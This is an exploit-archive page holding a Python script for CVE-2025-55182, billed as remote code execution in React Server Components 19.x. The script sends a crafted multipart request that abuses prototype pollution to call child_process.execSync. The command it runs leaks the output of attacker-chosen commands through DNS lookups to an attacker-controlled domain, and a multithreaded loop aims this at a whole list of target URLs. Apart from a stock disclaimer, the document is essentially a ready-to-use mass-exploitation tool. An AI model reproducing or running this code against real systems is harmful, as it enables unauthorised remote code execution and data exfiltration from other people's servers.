Share
## https://sploitus.com/exploit?id=PACKETSTORM:218661
# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Color definitions
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
END = '\033[0m'
print("""
โโโโโโโโโโโ โโโโโโโ โโโ โโโโโโ โโโโโโโโโโโ โโโโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโ
โโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโ
โโโโโโโโโ โโโ โโโ โโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโ
โโโโโโโโ โโโ โโโ โโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")
class NoUsageParser(argparse.ArgumentParser):
def error(self, message):
# completely suppress argparse usage
print(f"Error: {message}")
raise SystemExit(1)
parser = NoUsageParser(description="EynaExp Scanner")
parser.add_argument('-d', required=True)
parser.add_argument('-l', required=True)
parser.add_argument('-c', required=True)
print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n")
args = parser.parse_args()
dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
request_body = (
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"0\"\r\n\r\n"
"{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
"\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
"\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
"\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"1\"\r\n\r\n"
"\"$@0\"\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)
def send_request(target_url):
try:
response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
for header_key in ["x-action", "next-action", "rsc"]:
if header_key in response.headers:
result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
return result_message
except Exception as exception:
return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
with open(targets_file_path) as file_handle:
target_urls = [line.strip() for line in file_handle if line.strip()]
print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets โ starting multi-thread scan...{Colors.END}\n")
with ThreadPoolExecutor(max_workers=30) as executor:
futures = {executor.submit(send_request, url): url for url in target_urls}
for future in as_completed(futures):
print(future.result())